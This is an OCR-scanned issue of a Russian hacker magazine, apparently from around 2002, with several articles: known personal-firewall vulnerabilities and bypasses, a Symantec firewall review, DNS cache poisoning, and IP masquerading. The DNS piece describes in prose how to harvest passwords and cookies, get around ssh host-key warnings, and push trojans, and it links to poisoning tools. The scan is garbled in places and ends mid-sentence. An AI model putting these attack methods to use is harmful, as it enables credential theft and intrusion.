Проблема, найденная в Tiny Personal Firewall, позволяет хакеру, который 
находится с юзером в одной локальной сетке, модифицировать настройки 
фаерволла. Это возможно, когда местная система блокирована. Хакер Стасик, 
просматривающий сеть, может инициализировать аварийный диалог с 
рабочей станцией юзера. Появится диалоговое окно, которое потребует, 
чтобы хакер или разрешил, или запретил ввод. Если система работает 
автоматически или юзер отошел от компа и всю защиту повесил на плечи 
фаерволла, то нападающий может выбрать «разрешить» и без авторизации 
менять настройки Tiny Personal. 

Уязвимость найдена в Tiny Personal Firewall 2.0.15. 


SYGATE PERSONAL FIREWALL 


Итак, что у нас теперь интересного? Ara, Sygate Personal Firewall уязвим к 
нападениям ТР спуфинга, если хакер Стасик использует ТР адрес 127.0.0.0 - 
127.0.0.255. Уязвимость позволяет нападать на хост без риска быть 
обнаруженным. Проблема также может использоваться для организации 


других типов атак. Все ограничено только твоей фантазией и знаниями... 
Всего-то =). 
Уязвимость обнаружена в Sygate Personal Firewall 5.0. 


NORTON PERSONAL INTERNET FIREWALL 


Переполнение буфера происходит при попытке обработать большие запросы 
НТТР (как изнутри, так и по редиректу с сайта). Самое обидное для 
разработчиков, что даже если юзер просто кликнет по ссылочке на 
«Wwww.aaaaaaaaa(M так далее).сот», бага все равно работает. В результате 
возможно выполнение произвольного кода с завышенными привилегиями. 
Баг стабильно работает в Symantec Norton Internet Security 2001-3.0.4.91. 


ATGUARD 
Теперь обходим ограничения многими любимого @Guard. AtGuard - это 
утилита, умеющая блокировать баннеры, cookies, а также устанавливающая 
персональный firewall для защиты машины от воздействия троянов и 
сканирования портов из сети (а ведь когда-то рулил именно файрволл, а не 
все эти рюшечки - прим. ред.). AtGuard может разрешать только 
определенным приложениям выход в Интернет (например, IE). Однако при 
этом он проверяет только имя программы и не сохраняет путь к файлу или 
его контрольную сумму (в случае ТЕ - IEXPLORE.EXE). Уязвимость позволяет 


ОГНЕННОЕ РЕШЕТО 


peruse 


Seer ee iad Bie Beri ete 8, 


недозволенным Nporam He блокироваться, используя программы Tuna HTTP- 
Tunneling. Например, если Ha твоей тачке разрешен только IE и только Ha 80 
порту, можно использовать следующие действия, чтобы заработала ася. 
Устанавливаем HTTP-Tunnel-Client (www.HTTP-Tunnel.com) на компьютер. При 
попытке его сконфигурировать он выдаст сообщение об ошибке, что не может 
найти сервер НТТР-Типпе(. Теперь мы переименуем «HTTP-Tunnel Client.exe» 
на «IEXPLORE.EXE». После чего программа сообщит тебе, что она работает 
правильно. Используя HTTP-Tunnel, можно обойти любые ограничения на 
внешние подключения любыми программами (ася, трояны и т.п.). 

Бажены все версии собакибиага. 


KERIO PERSONAL FIREWALL 


Тоже очень известный персональный фаерволл для вынь-систем. Когда хакер 
Стасик начинает посылать, a Kerio, соответственно, получать большое 
количество SYN пакетов из одного источника, ЯгемаЦ-процесс начнет на 
100% потреблять ресурсы процессора и в конечном счете приведет к 
зависанию всей системы. Хакер Стасик любит Firewall” ные 3.147005`ы =). 
Уязвимость обнаружена в Kerio Personal Firewall 2 2.1-2.1.4. 


А КАК ЖЕ AGNITUM OUTPOST? 


Наверняка мой ящик уже готовится принять тучи флейма на тему, а где же баги 
в Outpost” e. Их есть у меня, но немного =). После продолжительного серфа по 
просторам Сети выяснилось, что это фаерволл, наименее бажный из семейства 
«Виндово-персональных». Но все же лови одну уязвимость на закусь :). 

Итак, Agnitum Outpost блокируют только пакеты, созданные стандартным 
адаптером протокола Windows. Т.е. если у пользователя достаточно прав 
создавать пакеты с другими адаптерами протокола, то он сможет обходить 
правила фильтрации firewall. Эксплуатация уязвимости ставит под угрозу 
политику безопасности (так вроде в Bugtraq ах пишут? :)). 


Ну вот. На сегодня вроде и все. Читай остальной Спец, и удачного хака тебе, 
приятель. Обойти грамотно настроенный фаерволл - это тебе не два пальца 
обо... Удачи, в общем. 
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Эх, братва, ностальгия замучила... Были же времена, когда 
мы Аутпоста видом не видывали, а старик @guard на все сто 
ee фразу из меню «Firewall Rules» :). Жалко мне 
АтГарда, страсть как жалко - не выжил он под лейблом NIS 
(Norton internet Security), опопсел и гикнулся в самые дальние 
каталоги пиратских дисков, Забыли о нем, наложили 
проклятие на Symantec, загубившую любимца, и посыпали 
вековой пылью... Вот такая присказка, а сказка... Сказка 
впереди! 


рис. 


Юрий Костомаров 


Началась сказка, как водится, со случайности. Отобрал я у Кириона диск 
«Коллекция Symantec 2003» (горбушечный, с гордым лейблом «100% ви- 
русов»), собрался утилы ставить, а там... «Symantec Client Firewall Corp 
Edition, профессиональная программа для защиты сети от хакеров». 
Мелькнула робкая надежда: неужели? Неужели мы снова можем бросить 
всю свою секьюрность в мозолистые руки дядьки Питера? Мышка на се- 
туп.ехе, даблкликнул. .. И пос-ка-кал :). 


ЧТО ТАКОЕ, КТО ТАКОЙ? 


Первое впечатление чуть ни разрушило все мечты до основания. Стан- 
дартный желтенький интерфейс, ползуночки-пеленочки и прочая сопли- 
вая фигня. Но это только поначалу :). Обкликав все, что мог, и прочитав 
хелпы от корки до корки, я выяснил, что: 


1. Новый нортоновский файрволл перестал быть персональным. То есть 
никто не мешает тебе юзать его клиент-версию на диалапном компе для 
защиты своего винта с попсой и порнухой (как я :)), а особо продвинутые 
смогут поставить его на все компьютеры локальной сети и админить уда- 
ленно (и массово :)). Для этого в комплекте идет Symantec Packager - про- 
га для составления инсталляционных пакетов, содержащих только необхо- 
димые фичи. Зачем бегать по компам локалки и отключать административ- 
ный модуль во всех клиентах, когда можно просто исключить его из спис- 
ка устанавливаемых компонентов? Такая вот забота о пользователе :). 
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Незамысловатый интерфейс 


2. Как истинный преемник АтГарда, он умеет собирать детальнейшую ста- 
тистику на текущее соединение и писать безупречные логи. Если тебя не 
смущают восемь типизированных и один глобальный журнал событий по 
каждому из соединений, то ты либо админ, уставший от логов на работе 
(шутка хумора: что делает админ, когда в его доме гаснет свет? - вздыха- 
eT, зажигает свечку и идет к счетчику читать логи :))), либо ОЧЕНЬ нелю- 
бопытный юзер. 


3. Нортон файрволл умеет не просто отражать атаки, а классифицировать 


их и предоставлять подробный отчет о нападавшем... потом... после 
BSoD и ребута :). 
050 поуетЬег/ 11/2002 


4. Разработчики не смогли удержаться и запихнули в него модную запад- 
ную фишку - Privacy Control. Лично я мало понимаю, какая же это при- 
ватность, если все под контролем :). Но им лучше знать. 


Итак, за ламеровато-мультяшным интерфейсом скрывается вполне про- 
фессиональный продукт. Посмотрим, как заставить его работать на дра- 
жайшего юзера. 


ЧТО ВНУТРИ? 


Настройки разделены по пунктам, что, вроде бы, должно облегчить про- 
цесс конфига, но... Нелогично как-то они раскиданы, особенно сложно 
кастомайзить нортонов файрволл после Аутпоста (уж очень там деревце 
приятное, но об этом в статье Алекса Шарка). 

Самые жизненно важные опции, как и следовало ожидать, лежат на пер- 
вой закладке и состоят из одной галки «Enable Security» :). Не стоит 
нервничать - впереди еще много сюрпризов. Так вот, под галкой притаи- 
лась кнопочка «Custom Level», на которую и возложена почетная миссия 
- выставлять основной уровень безопасности. Для Жавы и Активного Х 
можно назначить три варианта поведения: все разрешать, все убивать 
или обо всем спрашивать. Для софта же выбор поинтереснее: блокать 
все подряд, спрашивать или разрешать все, кроме троянов :). Мать чест- 
ная, что ж это делается? Трояну, состоящему в блок-листе файрволла 
(там изначально штук 50), вырваться на свободу не удастся, даже если 
разрешено все! Очень правильный подход для тупых юзверей, любящих 
давать кому попало :)... права на выход в Инет. 


В закладке «Internet Access Control» нашлось место для конфигов каждо- 
го из юзерских приложений. Проще всего сказать «Permit all» (Разре- 
шить), но если залезть в «Custom»... Отдыхают даже юниксоиды, такого 
количества пунктов для фильтрации я не видел даже в хваленых iptables 
(чего стоит один только фильтр на отдельные КОМАНДЫ протоколов!). 
Помурыжившись всего несколько минут, я создал для Бата правило на 
доступ к СМТПшникам только по SMTP, к РОРЗ-сервакам только по POP3, 
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Отдамся в хорошие руки 


отменил подключения к его портам извне, а все нештатные ситуации по- 
велел закатывать в лог и сообщать мне об этом в специальном попапе. 
Неплохо? А главное, что времени на это почти не ушло. Респекты Симан- 
теку. Кстати, на той же закладке задаются все правила для системных 
служб и троянов, а также присутствует оригинальная фича - скан всех 
приложений с целью определить, кто из них может рваться в нет. Дела- 
ется это очень оригинально: отловив запросы к системе, я выяснил, что 
он проверяет каждый из экзешников на тему использования им стан- 
дартных библиотек Remote Access’a. Во как хитро. Правда, поймать эк- 
зешник с самопальным модулем доступа ему не удастся, но это уже при- 
дирки. 

Новостью для меня стала закладка «Internet Zone». Файрволл предложил 
мне указать доверенные и запрещенные компы. Суть запрещенных я еще 
могу понять (порнуха, хаксоры и прочее), а вот нафига нужны доверен- 
ные? В хелпе пишут, что с них доступ к компу никак не ограничен... Ви- 
димо, туда надо запихнуть все тачки из локалки, 

но лично мне проще создать для них правило. За- 

гадка, в общем. 

С детектором атак приключилась следующая ис- 

тория - он пытается найти злой умысел в обыч- 

ном пинге (Алярм! PingOfDeath expected! :)). 

Именно поэтому тебе дано право отключать рас- 
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познавание отдельных типов атак или же атак с отдельных компов. Пло- 
хо только то, что нельзя скомбинировать оба этих действия - получается, 
что, разрешив портскан своему прову (для того чтобы меня не отрубили 
раньше времени), я разрешаю его всем. Хорошенькое дело! Смутная 
польза, очень смутная... 


ПОШЛИ В ПРИВАТ? 


Трясутся буржуи за свою «интеллектуальную собственность», ох, как тря- 
сутся! Для успокоения их больных нервов наш файрволл умеет блокать 
кукисы, отсеивать запросы к броузеру (тебе ведь неоднократно говори- 
ли, какая версия винды стоит на компе прямо с сайта? вот это и есть те 
самые запросы) и... внимание... блокировать конфиденциальную ин- 
формацию. Нафига это надо? Веришь, не знаю! Файрволл просто не про- 
пускает сохраненную инфу наружу по протоколу НТТР. Видимо, чтобы ты 
случайно не ввел номер своей кредитки в форму на порнушном рейтин- 
ге. 


АДВАНСЕД, 


Как всегда, самое вкусное спрятано за пимпой «Только для уверенных в 
себе и отвечающих за последствия своих действий» ака «Advanced 
Options». На закладочке «Web» можно заполнить список сайтов со спе- 
цифическими настройками. То есть ты можешь выставить галку «Сооб- 
щать версию броузера» для сайта, которому это нужно (если админ дер- 
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жит две версии - для Оперы и для ИЕ, а тебя все время выкидывает на 
кривой вариант), оставить в покое кукисы из интернет-магазина или 
разрешить скрипты для сайтов с апдейтами (вроде microsoft.com). 


В закладке «О{Нег» (или «Вроде-что-то-нужное-но-впихнуть-некуда-по- 
этому-лежит-здесь») можно задать порты, по которым ходит НТТР-тра- 
фик (для блокировки АктивХ и прочего) и выставить режим стелс - ког- 
да комп не заморачивается написанием ответного пакета на тему «Порт 
закрыт, нехрен сюда ломиться». 


ФИШКА 


Если ты повнимательнее приглядишься к скринам, то заметишь половин- 
ку маленького глобуса, торчащую из-за правого края монитора. Это есть 
очень модный аксессуар по имени Алерт Трекер. Когда происходит ка- 
кая-нибудь задница с соединением или тебя кто-то нюкает, или кто-то 
рвется в Инет, глобус выезжает и с модной анимацией докладывает о 
происшествии. Полезно и приятно. 


АДМИНИМ 


Нортон не был бы нортоном, если бы не приготовил нам очередного сюр- 
приза. Наставив файрволл-клиентов по компам локалки, можно присту- 
пить к настройке правил для них. Все, что до сих пор было разложено по 
закладочкам для юзеров, теперь стало доступно через эргономичный ин- 
терфейс админской консоли. Хотя какая это консоль - те же закладки и 
галочки, просто более грамотно сколоченные. Междумордие выполнено 
на чистой Жаве (Java Runtime Environment второй версии идет в ком- 
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плекте), то есть абсолютно платформонезависимо. Админ может сидеть 
хоть на Маке, хоть под Линухом - до своих юзверей он в любом случае 
доберется :). 


Импорт-экспорт конфигов (файлы *.cfp) устроен через простейшую ме- 
нюшку, нужен только доступ к компу подопечного. Удобство и простота - 
что еще нужно для настройки безопасности сети? Да ничего! :). 


ВОЗВРАЩЕНИЕ ДЖЕДАЯ 


Не знаю, как ты, а я уже приготовился выкидывать свой Аутпост - все 
равно в локальной сети от него нет никакого толка. А так как он нужен 
мне только в тяжкие минуты диалапа вне родной сети, держать его на 
винте незачем, ведь Нортон более универсален. Так что скоро еще одна 
сеть перейдет на новый файрволл, а ее админ (некто Дронич) будет по- 
лучать несказанное удовольствие от настройки файрволлов бедных юзе- 
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ЗАЧЕМ НУЖНЫ ТРИ ВЕСЕЛЫХ БУКВЫ? 


Иногда бывает так, что очень нужно, чтобы некий чел зашел на нашу веб- 
страничку, послал через нас какое-то письмо или каким-то иным обра- 
зом связался с нашим серваком, сам того не желая и даже не зная этого. 
Поскольку лишь редкие «зубры» Инета помнят ТР’шники всех используе- 
мых ими ресурсов, для остальных смертных была придумана О№-систе- 
ма, которая позволяла присваивать безликим цифрам ТР-адресов вполне 
понятные и запоминаемые имена, вроде vasechka.buhlo.ru, и преобразо- 
вывать потом эти имена в IP-agpeca. Не будем слишком глубоко рассма- 
тривать, как устроен DNS (иначе мы с тобой прямо тут костьми и поля- 
жем), обойдемся лишь базовыми сведениями: у каждого DNS сервера 
есть своя «зона ответственности» - это те записи о соответствии имя -> 
]Р-адрес, которые забиты в файлах его конфигурации. Часть серверов 
также содержит ссылки на адреса других DNS серверов для имен, входя- 
щих в зону их ответственности, но не обслуживаемых непосредственно 
ими (так называемые поддомены). 

Рассмотрим домен mydomain.net.ru. О№5-сервер, отвечающий за зону ги, 
содержит ссылку на сервера второго уровня, которые знают про зону 
net.ru, а те, в свою очередь, уже укажут на сервера третьего уровня, ко- 
торые знают про mydomain.net.ru и его содержимое. 

Также, для минимизации сетевого траффика, О№5-серверы часто имеют 
включенный кеш для запоминания ответов других серверов. При по- 
ступлении соответствующего запроса для определения ГР-адреса sexy- 
girls.mydomain.net.ru О№5-сервер (обычно провайдерский), к которому 
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обратился сетевой клиент, узнает адрес сервера, ответственного за до- 
мен ги у специальных «корневых» доменных серверов. Знания о них за- 
ложены в него при конфигурации, а применять он их будет только в 
случае, если sexygirls.mydomain.net.ru не находится в его зоне ответст- 
венности. Его запрос проходит по цепочке нейм серверов, пока не до- 
стигнет нужного сервака, который определенно сможет сказать: какой 
же IP-agpec у нужного хоста. Все полученные ответы попутно сохраня- 
ются в кеше (время сохранения ответов в кеше прописано в каждой 30- 
не свое). 


DNS CACHE POISONING 


Первая проблема с таким подходом была опубликована в ноябре 1998 
года и тогда же была исправлена во многих DNS-cepBepax (но далеко не 
во всех!). Проблема заключалась в том, что достаточно было послать не- 
коему DNS-cepsepy О№-ответ с информацией о каком-нибудь домене, и, 
несмотря на то, что сервер не посылал такого запроса, этот ответ все 
равно попадал в его кеш, и при последующих запросах сервак отдавал 
закешированный ответ, а не тот, который нужно. Вот сервера с таким 
багом: дефолтовая инсталляция Windows 2000 (но в настройках это 
можно выключить, если, конечно, знать про этот баг и где, собственно, 
выключать), BIND версий до 4.9.1, BIND 8.1 (подвержен модифициро- 
ванной версии атаки). Тулзы для юзания этой весьма полезной фичи 
можно взять тут: 


http://www.insecure.org/sploits/dns.cache-poison.cname.html 
http://packetstormsecurity.org/spoof/unix-spoof-code/ 
http://www.team-teso.net/releases/zodiac-0.4.9.tar.gz 


DNS POISONING 


Вторая возможность - подделать ответ OT одного из серверов в цепочке. 
Сначала нужно узнать, с какого адреса посылаются ответы про домен, ин- 
формацию о котором нужно подделать, затем выяснить адрес DNS-cepse- 
ра, используемого жертвой. Обычно это делается так: нужно зарегистри- 
ровать какой-нибудь домен и послать с адреса в этом домене мыло 
внутрь сетки чела, для которого мы подделываем О№-инфу. Mail server 
начнет резолвить домен, и мы увидим их запрос в логе нашего DNS-cep- 
вера или в выводе банального tcpdump’a. Дальше все просто - начинаем 
бомбардировать их О№5-сервер ответами якобы от DNS-cepBepa, ответст- 
венного за подделываемую зону (само собой, с подделанным исходящим 
1Р-адресом). Когда атакуемый сервак посылает запрос запоизоненному 
DNS-cepBaHTy, ему тут же приходит наш ответ. 


СТОЧКИ ЗРЕНИЯ ПИВА 


DNS poisoning - явление частое, поэтому ситуация в этой области может 
быть представлена как постоянная борьба админов с хакерами. Вот как 
это описывает Daniel Е. Boyd с точки зрения воровства пива: 

«Однажды к вам приходит чувак и говорит, что он пришел проверить эле- 
ктросчетчик. Когда он уходит, выясняется, что пиво из холодильника 
пропало... 

В следующий раз, когда приходят проверять счетчик, вы просите пока- 
зать удостоверение, - чувак показывает фальшивое удостоверение, и пи- 
ва снова нет. 

В очередной раз ты набираешь телефонный номер, написанный на удос- 
товерении, и подруга этого чувака (чей номер, конечно же, был записан 
в удостоверении) говорит: «Да, конечно, у нас работает такой сотруд- 
ник». Пиво, само собой, пропадает. 

Еще одна попытка - ты набираешь номер, написанный на 
счете за электричество, но оказывается, что в прошлый раз 
воры кинули поддельный счет за электричество в твой поч- 
товый ящик. И снова нужно идти в магазин за пивом... 
Через месяц, когда приходят проверять счетчик, ты берешь 
телефонную книгу и узнаешь оттуда номер конторы, но вы- 
ясняется, что в один из прошлых визитов мошенники под- 
менили телефонную книгу у тебя дома! И снова нет пива! 
Когда ты, наконец, узнал настоящий номер конторы, кото- 
рая продает тебе свет, знакомый пришедшего чувака уже 
стоит наготове у телефонного распределительного ящика. И 
когда ты набираешь номер, он говорит тебе, что все О’Кеу и 
теперь-то к тебе точно пришел настоящий сотрудник. Очень 
хочется пива!!! 

Через некоторое время, когда ты знаешь всех сотрудников 
той конторы в лицо, знаешь, куда звонить, купил мобилу для 
таких звонков, и обмануть тебя, казалось бы, просто невоз- 
можно!.. Они просто подкупают настоящего электрика, и ты 
опять остаешься без пива!» 


ДЛЯ ТЕХ, КТО НЕ ПЬЕТ ПИВО 


Как, ты так и не понял, в чем фишка DNS poisoning’a?!! Тог- 
да тебя не спасет даже замок на холодильнике! Можно сде- 
лать кучу веселых вещей: 

1. Просекаем пароли: 

Наивный админ заходит на свой хост (через telnet или ftp) 
по имени зирегзех.ги, само собой, он получает кривой ответ 
(админа мы вычислили ранее, и DNS сервачок, который он 
юзает, наполнили тем, что нам нужно) и попадает на наш 
хост (который, тем не менее, представляется как нужный 
ему хост). После ввода логина и пароля коннекшен, напри- 
мер, рвется или подвисает (симулируем всякие сетевые 
проблемы) - это самый простой вариант, либо делается 
проброс на настоящий сервак, и чувак вообще ничего не за- 
мечает, кроме того, что он пришел не с того адреса, на кото- 
ром сидит ;) (это тоже можно поправить через DNS). А у Hac 
в логах пишутся его пароли ;). 

Как вариант - умный админ ходит через ssh, который прове- 
ряет, действительно ли это тот хост, на который мы идем 
(достигается путем сверки запомненного серверного ключа 
с тем, который сервер предъявляет на этот раз). Обходится 
это тоже легко: выясняем Ssh какой версии (1 или 2) поль- 
зуется этот умный админ, и на нашем хосте ставим другую 
версию. Тогда ssh, порывшись в своих файлах, обнаружива- 
ет, что у него нет такого ключа, и предлагает админу этот 


ЯДОВИТЫЙ DNS 


ключ запомнить как правильный (вместо большой страшной таблички на 
тему «ОЙ! КУДА ТЫ ПРИВЕЛ НАС, ПРОКЛЯТЫЙ СУСАНИН?»). Админ обыч- 
но соглашается. Дальше все как с телнетом. 

Практически то же самое с другими протоколами, спрашивающими па- 
роль. 

2. Просекаем cookies: 

Некоторые системы (ну, типа, там порнуха, а иногда даже и всякие свя- 
занные с деньгами) хранят логин/пароль в куках. Подменяем ТР нужно- 
го веб-сервака, и все эти куки предъявляются нам, ну а мы их, само со- 
бой, сохраняем. Дальше, чтоб никто не догадался, мы редиректим юзера 
на реальный ресурс (делать это надо по ТР, иначе его опять к нам прине- 
сет ;)) во фрейме на весь экран (это чтобы адрес в «Location» поле не 
сменился). 

3. Накручиваем баннеры: 

Если ты подрабатываешь накруткой баннеров, заодно можно открыть не- 
видимый фрейм с кучей рефрешащихся баннеров, заполнить DNS кеш ка- 
кого-нибудь провайдера «правильными» ссылками на популярные ре- 
сурсы - и баннеры закрутятся с новой силой. 

4. Суем ишаку: 

Также вместо баннеров можно подсунуть какой-нибудь свежий эксплойт 
для лучшего друга всех черных шапок - Internet Explorer’a, и засунуть 
троянов всем, кто зайдет. Что делать после того, как троян подсажен, ду- 
маю, не нужно объяснять. 


Ну и, возвращаясь к теме файрволлов, скажу, что DNS poisoning - очень 
хороший способ заставить кого-то из внутренней сетки, защищенной 
файрволлом, попасть на наш сервак. А как использовать сей замечатель- 
ный факт, ты узнаешь из статьи «Проходим сквозь файрволл» в этом же 
номере. 


Так что юзай мощные фичи, почаще читай доки и баг-траки, а глав- 
ное... веди себя хорошо ;)! 
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Е Сегодня мы подробно рассмотрим популярный метод защиты 


сетей - р-маскарадинг. Что за зверь такой и кто его юзает? 
Сейчас в Интернете это очень-очень популярно среди многих 
компаний. Конечно же, никто из админов сеток не хочет, 
чтобы вся сеть, подрубленная к нету, была доступна все 
остальным. Нужно, чтобы доступ был только туда, куда надо 
админам и злобному боссу, а кто пытается пройти куда-то 


прячем сеть от чужих глаз еще - сразу и без разговоров посылался нах. 


MACHAPADUH 


J[{rimZ (hrimz@xakep.ru) рис. Алексей Борисов 


Все это можно реализовать с помощью файрволлов. Для этого брандмауэр 
нужно сконфигурировать на фильтрацию входящих/исходящих пакетов. 
Такие фильтры имеются как в софтверных, так и в аппаратных реализациях 
файрволлов. Вообще-то, если у тебя dial-up доступ, то маскарадинг тебе 
нафиг He нужен, а вот если есть LAN, и всем охота иметь выход в сеть, и бе- 
зопасность тоже важна, то 1р-маскарадинг - твой выбор. Или пров выделя- 
ет твоей сетке только один ip, а у тебя там 100 машин :). Да даже если у 
каждой тачки твоей сетки есть реальный 1р в нете, то можно юзать маска- 
радинг, чтобы скрыть «нутровую» структуру сети. Надеюсь, ты понял, что 
вещь это архиполезная. 

А вот в чем заключается основная фишка всего этого маскарада. Есть Ин- 
тернет и есть LAN, все исходящие пакеты из внутренней сети фильтруются 
файрволлом и в header ах пакетов в поле «source IP» внутренние адреса 
сети переписываются на IP фильтрующего шлюза, а во входящих (ответ- 
ных) пакетах переписывает «destination IP» (свой) на внутренний IP той 
машины, которая делала запрос вовне. Для хацкера, сидящего где-то дале- 
ко в нете, это выглядит так, как будто все запросы исходят из единственной 
тачки-шлюза. То есть внутренний LAN как бы и нет =). Реализовать все это 
можно без особого напряга, если шлюз - это *п1х`овая система (и подзамо- 
рочиться, если вынь-дос). Это все потому, что в никсах есть офигенная ути- 
лита-файрволл - ipchains (да и вообще там много офигенных утилит). Вот 
на примере ipchains мы и реализуем 1р-маскарадинг для «нашей сети». 


НАША СЕТЬ 


Итак, что же будет представлять наша сеть? Допустим, ты простой работник 
в крутой конторе, и тебе нужно настроить 1р-маскарадинг. Ты открываешь 
Спец на нужной странице и жадно вчитываешься =). В общем, ситуация та- 
кая. Куплен домен, например, megatron.net. К нету подрублена только од- 
на шлюз-тачка через оптику. Адрес шлюза security.megatron.net. Сеть по- 
строена на Ethernet, твоя личная машина зовется xakep_host. Приступим! 
Нам нужно, чтобы пакеты из внутренней сетки некогда не выходили в Инет 
без фильтрации, ну и наоборот - соответственно. Адресация внутренней се- 
ти должна быть из определенного диапазона: 10.*.*.*, 172.16.*.* и 
192.168.*.*. Это ГаКе-адреса, которые He маршрутизируются глобально, то 
есть в нете ты не найдешь серваков с ТР из этого диапазона. Только в част- 
ных сетях. Реализовывать мы все это будем в *п1х`ах. Так будет лучше для 
всех (если с никсами траблы - читай в этом же номере статью по ipchains - 
там все хорошо рассказано и снабжено примерами). 


ПРИМЕР НОМЕР РАЗ 


Попытаемся разрешить доступ из LAN к веб-серваку в Инете. Адресация в 
конкретно нашей LAN - 192.168.13.*, твой xakep_host имеет адресок 
192.168.13.111, а адрес файрволла - 192.168.13.222. Файрволл настроен 
на подмену любых пакетов, исходящих из LAN и направленных на 80 порт 
сервака в Инете. Твой браузер (Орега, например) стандартно настроен для 
соединения, и DNS-cepBep во внутренней сети поставлен грамотно, а не Де- 
дом Морозом. Да, и еще одно условие - файрволл должен служить стан- 
дартным маршрутизатором в сети. 

Теперь проследим сам экшн по net-surf y. Опера на твоей Taye запрашивает 
хост http://www.worldsex.com и получает IP 207.246.141.25. Она открывает 
соединение с этим айпишником, юзая локальный порт 666, и запрашивает на 
веб-сервере (портик 80) страничку harcore_gibbon_anal_mpegs.htm. Паке- 
ты от xakep_host (портик 666) к worldsex.com (портик 80) проходят через 
фаервольный фильтр, они перелопачиваются так, чтобы выходить с фаер- 
вольного порта 11111. Наш любимый firewall имеет допустимый в Инете IP- 
адрес (213.45.76.11 - взять просто из головы), следовательно ответные па- 
кеты от worldsex.com нормально приходят на файрволл. По прибытию паке- 
ты от worldsex.com к security.megatron.net (порт 11111) перезаписываются 
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так, чтобы идти на xakep_host порт 666. В этом и 
состоит фокус маскарада: он помнит, когда он пе- 
резаписал исходящие пакеты, и может переписы- 
вать их обратно, когда приходят ответы на них. 
Орега отображает долгожданную порнуху. То есть 
с точки зрения worldsex.com соединение было 
сделано между 213.45.76.11 (firewall’om) порт 
11111 и 207.246.141.25 (worldsex.com) порт 80. С 
точки зрения xakep_host соединение было сдела- 
но между 192.168.1.111 (xakep_host) порт 666 и 
207.246.141.25 (worldsex.com) порт 80. И только 
файрволл знает всю правду. Вот такие стремные 
дела =). 


ПРИМЕР НОМЕР ДВАС 


Так, давай рассмотрим еще один пример. Твоя 
сетка - часть Интернета: пакеты могут бегать без 
изменения из одной сети в другую. Адреса ТР 


внутренней сети должны быть назначены из вы- 
деленного блока адресов IP (которые пров дал) 
так, чтобы остальная часть сети знала, как пере- 
дать пакеты, адресованные тебе. В этом случае 
фильтрация используется для ограничений паке- 
тов, пересылаемых между твоей сетью и осталь- 
ной частью Инета, то есть ограничивается только 
доступ остальной части Интернета к твоим внут- 
ренним серверам. Сам пример: открываем доступ 
из твоей сети к web-cepBakam в Инете. В нашей 
внутренней сети адреса назначены согласно вы- 
деленному блоку ТР адресов (допустим - 
213.45.76.*). Файрволл настроен на пропуск 
всего траффика. Остальное же настроено так же, 
как в первом примере. Зажигай! Опера обраща- 
ется на http://www.worldsex.com и опять же уз- 
нает его ТР - 207.246.141.25. Затем браузер от- 
крывает соединение с этим айпишником, юзая 
локальный порт 666 и удаленный (Ha мог(ех`е) 
80 порт. Ну и, конечно, запрашивается любимая 
страничка :-). Пакеты преодолевают файрволл 
так же, как они проходят через несколько марш- 
рутизаторов между тобой и worldsex.com. Гиббо- 
ны снова на экране. Что же у нас имеется? А у 
нас имеется только одно соединение между 
192.168.13.111 (xakep_host) порт 666 и 
207.246.141.25 (worldsex.com) порт 80. Никаких 
наворотов, только злобные хацкеры в сеть уже 
не залезут. 


ВДОГОНКУ 


Кроме файрволла существуют еще и другие спо- 
собы обеспечить доступ из Инета к ресурсам на- 
шей cynep-LAN. Эти способы основаны на прин- 
ципах маскарадинга для внешних соединений. 
Самый простой способ заключается в запуске так 
называемого перенаправителя (redirector), кото- 
рый является своеобразным прокси. Он ожидает 
соединения на заданном порте, а затем открыва- 
ет соединение на фиксированном «нутровым» 
хосте и порте и копирует данные между двумя 
соединениями. Пример такой программы - redir в 
никсах. С точки зрения глупого нета соединение 
установлено с нашим файрволлом. А вот с точки 
зрения не менее глупого внутреннего сервака - 
соединение установлено от внутреннего интер- 
фейса файрволла к серваку. Короче, обмануты 
все =). Другой подход (для него нужны *nix с 
версией ядра выше 2.1, а есть еще у кого-то ни- 
же? :)) состоит в использовании форвардинга 
портов в ядрышке. Он делает ту же самую рабо- 
ту, что и тулза redir, но другим способом: ядро 
переписывает проходящие пакеты, заменяя их 
адрес и порт назначения на адрес и порт внут- 
реннего хоста. Инет думает, что соединение уста- 
новлено с нашим файрволлом, а «нутровый» сер- 
вак думает, что это прямое соединение из нета 
до него. Опять всех админ надул :). 


НАТЯГИВАЕМ 


Теперь рассмотрим, как наш брат хацкер всех на- 
тягивать будет, ведь обойти маскарадинг тоже 
можно. Например, вот таким способом. Этот спо- 
соб нашел бравый хацкер из забугорья Н.П. 
Moore (hdm@secureaustin.com). Из-за того, что в 
коде, отвечающем за маскарадинг, найдены 
траблы, хацкер может перезаписать установки 
маскарадинга ЦОР, после чего он будет способен 
организовать туннелирующее (подробно об этом 
тоже читай в этом номере) ИОР-соединение с 
тачкой, находящейся за файрволлом, осуществ- 
ляющим маскарадинг. Хакер не может знать, ка- 
кие порты и адреса используются во внутренней 
сети, если, конечно, ему сам админ по пьяни не 
скажет (НЛП, блин), но он может вычислить чис- 
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В НОМЕРЕ: 


Отчет о крупнейшей игровой 
выставке. Пусть в этом году Tokyo 
Game Show и не смогла удивить 
нас чем-то особенным, тем не 
менее она остается одним из 
самых заметных событий года. 


Эксклюзивный 06- 
зор игры по мотивам новейшего 
блокбастера. Даже из «Властелина 
колец» можно сделать beat ‘em up. 
И какой! Платина и «Выбор 
редакции» от «Страны Игр»! 


. Сможет ли пер- 
сонаж Тома Клэнси потеснить 
Снейка Солида? Реальнейший 
конкурент Metal Gear Solid уже на 
подходе. Время готовится к его 
прибытию на PC и Xbox. 


Развитие идей мегахитового Grand 
Theft Auto 3. Выход игры запла- 
нирован на конец октября, так что 
самое время суммировать всю 
имеющуюся а 0 HOBOM 
суперпроекте для PlayStation 2. 


Пусть эта 
игра и не затмит в глазах широкой 
публики Counter-Strike, но по многим 
параметрам новый многопользова- 
тельский шутер/симулятор войны 
переплевывает детище Gearbox. 
Новый жанр? Возможно. 
Гениальная мультиплеер-забава? 
Несомненно! 


ВНИМАНИЕ! Новая оболочка диска и 
улучшенный контент! Также на 
нашем CD: эксклюзивная демо- 
версия James Bond 007: NightFire! 


(game) lang} 


www.gameland.ru 


FIREWALL 


ло текущих соединений, идущих через файрволл и количество машин, Ha- 
ходящихся за огненной стеной. Любая сетка, где юзается маскарадинг UDP- 
траффика, уязвима для такой атаки (а ведь UDP-npotokon юзает множество 
прог). Поскольку UDP - это протокол, в котором отсутствует понятие соеди- 
нения (как ТСР), то единственный путь определить, что маскированное со- 
единение более не используется, - по тайм-ауту или же после получения 
сообщений ТСМР, говорящих, что порт закрыт (пинговать надобно). На 
